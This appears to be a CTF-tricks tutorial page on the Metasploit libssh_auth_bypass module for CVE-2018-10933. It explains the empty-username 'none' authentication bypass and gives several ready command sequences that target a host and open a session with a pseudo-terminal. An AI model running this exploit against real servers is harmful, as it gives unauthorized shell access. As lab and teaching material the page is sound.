> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/ssh/trick-0431.md).

# Libssh Authentication Bypass Exploit (Metasploit)

***

Use the `scanner/ssh/libssh_auth_bypass` Metasploit module to exploit the CVE-2018-10933 vulnerability, bypassing authentication to gain unauthorized access. This module exploits an authentication bypass in libssh versions 0.6 and 0.7.x before 0.7.6 and 0.8.x before 0.8.1. Authentication can be bypassed by sending a `SSH2_MSG_userauth_request` message with authentication type `none` and an empty username. Set the target host(s) and configure options like `spawn_pty` and `CreateSession` as needed before running the exploit.

```
use scanner/ssh/libssh_auth_bypass
set spawn_pty true
set rhosts target1.ine.local
set CreateSession true
run
```

The `CreateSession` option, when set to true, attempts to create a session on the target host if the authentication bypass is successful. Setting `spawn_pty` to true attempts to spawn a pseudo-terminal on the target host if the authentication bypass is successful.

Alternatively, the module can be used with the `exploit` command:

```bash
msf > use auxiliary/scanner/ssh/libssh_auth_bypass
msf auxiliary(scanner/ssh/libssh_auth_bypass) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(scanner/ssh/libssh_auth_bypass) > set RPORT 22
RPORT => 22
msf auxiliary(scanner/ssh/libssh_auth_bypass) > exploit
```

Another example showing the use of `run`:

```bash
msf6 > use auxiliary/scanner/ssh/libssh_auth_bypass
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set RHOSTS target.example.com
RHOSTS => target.example.com
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
```
